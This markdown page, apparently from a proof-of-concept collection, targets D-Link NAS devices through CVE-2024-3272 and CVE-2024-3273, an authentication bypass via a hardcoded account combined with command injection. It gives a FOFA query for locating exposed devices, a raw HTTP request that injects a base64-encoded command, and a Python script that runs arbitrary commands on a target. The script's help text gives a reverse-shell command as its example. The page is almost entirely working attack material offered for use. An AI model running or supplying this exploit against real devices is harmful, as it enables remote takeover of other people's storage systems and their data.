## D-Link-NAS(CVE-2024-3272&&CVE-2024-3273)

## fofa
```
body="Text:In order to access the ShareCenter"
```

## poc
```
GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd==&cmd=15&system=aWQ= HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Linux; Android 8.0.0) AppleWebKit/531.0 (KHTML, like Gecko) Chrome/40.0.874.0 Safari/531.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: close
```

![1f355c5370398227eca27bbebee72708](https://github.com/wy876/POC/assets/139549762/b0107148-fdd2-461d-aeff-d9c50a2069a8)

## 脚本
```python
# Author: Nick Swink (c0rnbread)
# Original post: https://github.com/netsecfish/dlink
# CVE-2024-3272 + CVE-2024-3273
#
# Description: Backdoor Authentication Bypass + Command Injection 
# Affected Devices:
# 	DNS-320L Version 1.11, Version 1.03.0904.2013, Version 1.01.0702.2013
# 	DNS-325 Version 1.01
# 	DNS-327L Version 1.09, Version 1.00.0409.2013
# 	DNS-340L Version 1.08

import requests, argparse, base64

def main(url, command):

	base64_command = base64.b64encode(command.encode('utf-8'))
	base64_command = base64_command.decode('utf-8')

	uri = f"/cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system={base64_command}"  

	print("Sending exploit request to endpoint...")
	print(url + uri)

	r = requests.get(url + uri)

	if r.status_code == 200:
		print("Status code: 200")
		print("Exploit appeared to succeed!")
		print(f"\n\tPrinting output: {base64.b64decode(r.text).decode('utf-8')}")


	else:
		print("Status NOT 200")
		print("Exploit Failed. Exiting...")
		exit()


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Execute arbitrary command on remote system.")
    parser.add_argument("url", help="Base URL of the D-Link web interface. e.g., http://example.com")
    parser.add_argument("command", help="Command to be executed. e.g., /bin/sh -i >& /dev/tcp/localhost/9999 0>&1")

    args = parser.parse_args()

    main(args.url, args.command)

```